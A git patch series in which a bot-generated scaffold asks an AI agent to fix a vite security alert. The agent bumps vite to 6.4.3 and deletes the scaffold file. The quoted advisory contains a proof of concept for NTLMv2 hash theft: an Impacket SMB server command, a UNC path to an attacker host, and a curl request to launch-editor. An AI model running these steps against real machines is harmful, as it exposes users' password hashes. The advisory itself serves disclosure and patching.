From 5a2db11d93ba15ebbdb3f50d8589fe833e99722b Mon Sep 17 00:00:00 2001
From: "github-actions[bot]"
 <41898282+github-actions[bot]@users.noreply.github.com>
Date: Wed, 24 Jun 2026 11:01:26 +0000
Subject: [PATCH 1/2] [Dependabot Alert #32] Scaffold PR for vite

---
 .github/dependabot-alerts/alert-32.md | 81 +++++++++++++++++++++++++++
 1 file changed, 81 insertions(+)
 create mode 100644 .github/dependabot-alerts/alert-32.md

diff --git a/.github/dependabot-alerts/alert-32.md b/.github/dependabot-alerts/alert-32.md
new file mode 100644
index 0000000..0d54837
--- /dev/null
+++ b/.github/dependabot-alerts/alert-32.md
@@ -0,0 +1,81 @@
+@devin-ai-integration Please resolve this Dependabot security alert.
+
+**Instructions:**
+1. Analyze the vulnerability and understand its impact
+2. Update the affected dependency to a secure version
+3. Ideally resolve this without using an override - prefer updating the dependency directly
+4. If an override is absolutely necessary, document why in the PR description
+5. Run tests to ensure the update doesn't break anything
+6. Push your fix to this PR branch and tag @davidkonigsberg for review
+7. Delete the scaffold file (.github/dependabot-alerts/alert-*.md) as part of your fix
+
+**Alert Details:**
+
+- **Package:** vite (npm)
+- **Severity:** MEDIUM
+- **Vulnerable versions:** <= 6.4.2
+- **Patched version:** 6.4.3
+- **CVE:** CVE-2026-53632
+- **GHSA:** GHSA-v6wh-96g9-6wx3
+- **Manifest:** package-lock.json
+
+**Summary:**
+launch-editor: NTLMv2 hash disclosure via UNC path handling on Windows
+
+**Description:**
+### Summary
+The `launch-editor` NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking.
+
+### Impact
+
+If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the `launch-editor`:
+
+- using Windows
+- NTLM is not disabled ([it is recommended to disable](https://techcommunity.microsoft.com/blog/windows-itpro-blog/advancing-windows-security-disabling-ntlm-by-default/4489526), while it's still enabled by default)
+- the user accesses the attackers website that sends request to a middleware using `launch-editor`
+- the server that has the middleware using `launch-editor` is running
+- the attacker knows the URL for that server and the middleware
+
+This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems.
+
+### Details
+`launch-editor` accepts file paths without validating or restricting Windows UNC paths such as:
+
+```
+\\attacker-host\share
+```
+
+On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur.
+
+If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password.
+
+The attacker could target a developer that uses a development server using `launch-editor` to develop code locally, send them a link and grab their NTLMv2 hash.
+
+### PoC
+From the attacker side, we will setup an SMB server. I personally used [Impacket's smbserver.py](https://github.com/fortra/impacket/blob/master/examples/smbserver.py), but you could use something like [Responder](https://github.com/lgandx/Responder) for this as well. For keeping it simple, we will use `smbserver.py` here.
+
+First, let's create a directory to serve as an SMB share.
+```
+mkdir /tmp/data
+echo "Hello world" > /tmp/data/test.txt
+```
+
+Then, start the SMB server.
+```
+$ sudo smbserver.py -smb2support -debug share /tmp/data
+```
+
+Now, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally (`vite`).
+
+Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use `curl` to achieve the same.
+
+```
+curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt'
+```
+
+Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of `smbserver.py` and see the NTLMv2 hash coming in.
+
+<img width="1916" height="277" alt="2026-01-30_10-58" src="https://github.com/user-attachments/assets/2f606e8f-c9bb-41dc-b507-ea6606b53368" />
+
+---
+[View Dependabot Alert](https://github.com/fern-api/sync-openapi/security/dependabot/32)

From 4fbe6bc1c20d83412c9e7a734c70a52fc7555c64 Mon Sep 17 00:00:00 2001
From: Devin AI <158243242+devin-ai-integration[bot]@users.noreply.github.com>
Date: Wed, 24 Jun 2026 11:03:49 +0000
Subject: [PATCH 2/2] fix(deps): bump vite to ^6.4.3 to fix CVE-2026-53632

Update vite from ^6.4.2 to ^6.4.3 to resolve GHSA-v6wh-96g9-6wx3
(launch-editor NTLMv2 hash disclosure via UNC path handling on Windows).

Direct dependency update - no override needed.

Co-Authored-By: David Konigsberg <davidakonigsberg@gmail.com>
---
 .github/dependabot-alerts/alert-32.md | 81 ---------------------------
 package-lock.json                     |  8 +--
 package.json                          |  2 +-
 3 files changed, 5 insertions(+), 86 deletions(-)
 delete mode 100644 .github/dependabot-alerts/alert-32.md

diff --git a/.github/dependabot-alerts/alert-32.md b/.github/dependabot-alerts/alert-32.md
deleted file mode 100644
index 0d54837..0000000
--- a/.github/dependabot-alerts/alert-32.md
+++ /dev/null
@@ -1,81 +0,0 @@
-@devin-ai-integration Please resolve this Dependabot security alert.
-
-**Instructions:**
-1. Analyze the vulnerability and understand its impact
-2. Update the affected dependency to a secure version
-3. Ideally resolve this without using an override - prefer updating the dependency directly
-4. If an override is absolutely necessary, document why in the PR description
-5. Run tests to ensure the update doesn't break anything
-6. Push your fix to this PR branch and tag @davidkonigsberg for review
-7. Delete the scaffold file (.github/dependabot-alerts/alert-*.md) as part of your fix
-
-**Alert Details:**
-
-- **Package:** vite (npm)
-- **Severity:** MEDIUM
-- **Vulnerable versions:** <= 6.4.2
-- **Patched version:** 6.4.3
-- **CVE:** CVE-2026-53632
-- **GHSA:** GHSA-v6wh-96g9-6wx3
-- **Manifest:** package-lock.json
-
-**Summary:**
-launch-editor: NTLMv2 hash disclosure via UNC path handling on Windows
-
-**Description:**
-### Summary
-The `launch-editor` NPM package accesses arbitrary paths including Windows UNC paths. When a UNC path is opened, Windows automatically attempts NTLM authentication to the remote host, causing the user’s NTLMv2 password hash to be leaked to an attacker-controlled SMB server. This can result in credential compromise through offline hash cracking.
-
-### Impact
-
-If the following conditions are met, an attacker can get the NTLMv2 password hash on the computer that is using the `launch-editor`:
-
-- using Windows
-- NTLM is not disabled ([it is recommended to disable](https://techcommunity.microsoft.com/blog/windows-itpro-blog/advancing-windows-security-disabling-ntlm-by-default/4489526), while it's still enabled by default)
-- the user accesses the attackers website that sends request to a middleware using `launch-editor`
-- the server that has the middleware using `launch-editor` is running
-- the attacker knows the URL for that server and the middleware
-
-This would be a problem if the user password is too simple that it can be identified through offline hash cracking, potentially leading to further compromise of developer accounts or internal systems.
-
-### Details
-`launch-editor` accepts file paths without validating or restricting Windows UNC paths such as:
-
-```
-\\attacker-host\share
-```
-
-On Windows systems, accessing a UNC path triggers an automatic NTLM authentication attempt to the remote SMB server. No user interaction or warning is required for this authentication attempt to occur.
-
-If an attacker controls the SMB server referenced by the UNC path the victim’s NTLMv2 hash is transmitted to the attacker. The attacker can then capture the hash and perform offline password cracking. Successful cracking reveals the victim’s cleartext password.
-
-The attacker could target a developer that uses a development server using `launch-editor` to develop code locally, send them a link and grab their NTLMv2 hash.
-
-### PoC
-From the attacker side, we will setup an SMB server. I personally used [Impacket's smbserver.py](https://github.com/fortra/impacket/blob/master/examples/smbserver.py), but you could use something like [Responder](https://github.com/lgandx/Responder) for this as well. For keeping it simple, we will use `smbserver.py` here.
-
-First, let's create a directory to serve as an SMB share.
-```
-mkdir /tmp/data
-echo "Hello world" > /tmp/data/test.txt
-```
-
-Then, start the SMB server.
-```
-$ sudo smbserver.py -smb2support -debug share /tmp/data
-```
-
-Now, run any project that uses the launch-editor package. I have setup a simple "Hello world" project that uses Vite to do this. Then run the project locally (`vite`).
-
-Now last, we will open a browser window and navigate to the URL used by the launch-editor package to trigger the NTLM authentication. Or we can use `curl` to achieve the same.
-
-```
-curl 'http://localhost:5173/__open-in-editor?file=%5c%5c127.0.0.1%5cshare%5ctest.txt'
-```
-
-Note the IP address in the HTTP request, and make sure it connects to the IP address of the SMB server. Now we can look at the logs of `smbserver.py` and see the NTLMv2 hash coming in.
-
-<img width="1916" height="277" alt="2026-01-30_10-58" src="https://github.com/user-attachments/assets/2f606e8f-c9bb-41dc-b507-ea6606b53368" />
-
----
-[View Dependabot Alert](https://github.com/fern-api/sync-openapi/security/dependabot/32)
diff --git a/package-lock.json b/package-lock.json
index c17d107..bd7d11b 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -23,7 +23,7 @@
         "@types/node": "^20.0.0",
         "@vercel/ncc": "^0.36.1",
         "typescript": "^5.0.4",
-        "vite": "^6.4.2",
+        "vite": "^6.4.3",
         "vitest": "^4.1.0"
       }
     },
@@ -2167,9 +2167,9 @@
       "license": "ISC"
     },
     "node_modules/vite": {
-      "version": "6.4.2",
-      "resolved": "https://registry.npmjs.org/vite/-/vite-6.4.2.tgz",
-      "integrity": "sha512-2N/55r4JDJ4gdrCvGgINMy+HH3iRpNIz8K6SFwVsA+JbQScLiC+clmAxBgwiSPgcG9U15QmvqCGWzMbqda5zGQ==",
+      "version": "6.4.3",
+      "resolved": "https://registry.npmjs.org/vite/-/vite-6.4.3.tgz",
+      "integrity": "sha512-NTKlcQjlAK7MlQoyb6LgaqHc8sso/pVyUJYWMws3jg21uTJw/LddqIFPcPqP6PzpgbIcZyKI85sFE4HBrQDA8A==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
diff --git a/package.json b/package.json
index eda1a74..e204f23 100644
--- a/package.json
+++ b/package.json
@@ -32,7 +32,7 @@
     "@types/node": "^20.0.0",
     "@vercel/ncc": "^0.36.1",
     "typescript": "^5.0.4",
-    "vite": "^6.4.2",
+    "vite": "^6.4.3",
     "vitest": "^4.1.0"
   },
   "overrides": {